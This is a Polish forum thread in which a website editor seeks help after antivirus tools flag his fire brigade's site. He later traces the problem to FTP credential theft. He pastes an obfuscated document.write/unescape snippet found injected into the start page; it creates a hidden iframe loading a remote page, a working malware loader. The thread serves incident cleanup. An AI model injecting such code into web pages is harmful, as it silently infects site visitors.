Witam

Ostatnio zainfekował mój komputer wirus, poległem potrzebny był format potem okazało się ze zainfekowałem nieświadomie stronę którą współredaguję. Narobiłem sobie niezłego pasztetu.

Już trzech kolegów mnie o tym powiadomiło a każdy ma inny program antywirusowy, ze na stronce jest paskudny wirus.

oto jego parametry:koń trojański-Downloader. JS. Psyme.lg

i Pytanie co to za paskudztwo jak to usunąć? czy szukać tego pliku o rozszerzeniu .lg?

Strona jest html-u ma 2skrypty zewnętrzne .js i skrypt aktualizacji sa też pliki .swf. Czy może ten wirus się gdzieś przykleił do tych plików?

Skanowanie jak na razie nic nie daje. czy wymienić piliki i nadać inną nazwą.

A wszystko dzieje się na tej stronie, uprzedzam przed wirusem na tej stronie :

http://www.kppspotwock.pl

Proszę o pomoc dla chłopaków ze straży

Gdzie niby jest ten trojan? Nic nie widzę. Strona jest IMHO czysta.

mi KIS też nic nie wykrył

może sprytna reklama?

Chciałby żebyś miał racje, może sobie poszedł :o

A tak poważnie to wchodziłeś w podstrony! i w galerie zdjęć! w albumy!

Naprawdę tam był, nie mam urojeń i nie robiłbym nie z siebie oszołoma, pierwszy raz miałem taki przypadek. Nie jestem programistą a z trzech źródeł miałem sygnały.

Reklamować można produkty, usługi komercyjne i obecnie polityków a nie straż! i nie w taki sposób jak myślisz. Strona jest w budowie.

Jasne. Wchodziłem po kolei w zakładki, zdjęcia i inne. Żadnych infekcji. Wchodzę z Firefoxa, w tle pracuje NOD32

Odnoszę wrażenie, że koledzy używają jakiś kiepskich antywirusów, które powodują fałszywe alarmy widząc zagrożenie w skryptach Javy

miałem NOD32 przepościł, teraz testuje kacperskiego

A co konkretnie przepuścił?

wirusy!, komp mi sie zawieszał, dysk cały czas pracował, programy sie nie odpalały, został zablokowany dostęp do internetu przez co NOD32 sie nie mógł aktualizować . Było duże spustoszenie w systemie.

Na codzień używam Avasta ( na razie ). Ściągnąłem do niego najnowszą bazę

wirusów (000781-1, 07-10-14), następnie zrobiłem sobie na dysku lustro Twojej

strony ( z użyciem WinHTTrack ) i wykonałem jego dokładne skanowanie.

Wynik tego skanowania jest negatywny - Avast nic nie znalazł

Kolego. Ja pytam o konkrety a nie o bajki na dobranoc

Tak się składa, że NOD32 od lat ma pełną certyfikację Virus Bulletin co oznacza, że wykrywa wszystkie wirusy on-wild

Skoro twierdzisz, że coś przepuścił to chcę wiedzieć co KONKRETNIE

:shock:

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0038 8)

Dzięki wszystkim za tak duży odzew.

Zacząłem przeglądać pliki na serwerze, zauważyłem na stronie startowej dziwny kod js ja go tam nie umieszczałem!

document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%74%72%2F%69%6E%64%65%78%2E%70%68%70%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E"));

w kopi zapasowej tego nie miałem. Co to jest?, czy ktoś zna się a tym?, może ktoś to mi wkleił. Moze to jest ten wirus???

Złączono Posta : 16.10.2007 (Wto) 18:08

Witam dziś przeglądając stronę w IE5 w podstronie historia wyskoczył mi alarm ze jest wirus.Co to jest i gdzie jak to można zlikwidować na stałe?

Złączono Posta : 07.11.2007 (Sro) 20:39

Chyba sie uporałem z tym problemem, konsultowałem się tu i tam i wyszło że rozwiązaniem jest program Total Commander przez który wysyłam pliki na serwer. Po wrzuceniu na serwer do mojego pliku index. html dopisuje się ten wirus.

To wskazówka dla mnie i innych:

POLECAMY NAJPIERW ZMIENIĆ HASŁO DO KONTA, A PÓŹNIEJ NIE ZAPAMIĘTYWAĆ ZMIENIONEGO HASŁA W PROGRAMIE FTP

to podziałało jak na razie wszystko jest oki. Za każdym razem wpisujcie hasło, i co jakiś czas zmieniajcie na inne, to znacznie utrudnia dopisywanie się takich wirusów.

Więcej znajdziecie tu:

http://republika.onet.pl/pomoc/0,0,68,4,0,40,1,0,pomoc.html

ale jeśli coś znowu zauważycie nie tak na mojej stronie: http://www.kppspotwock.pl to powiadamiajcie.

Pozdrawiam uuffff,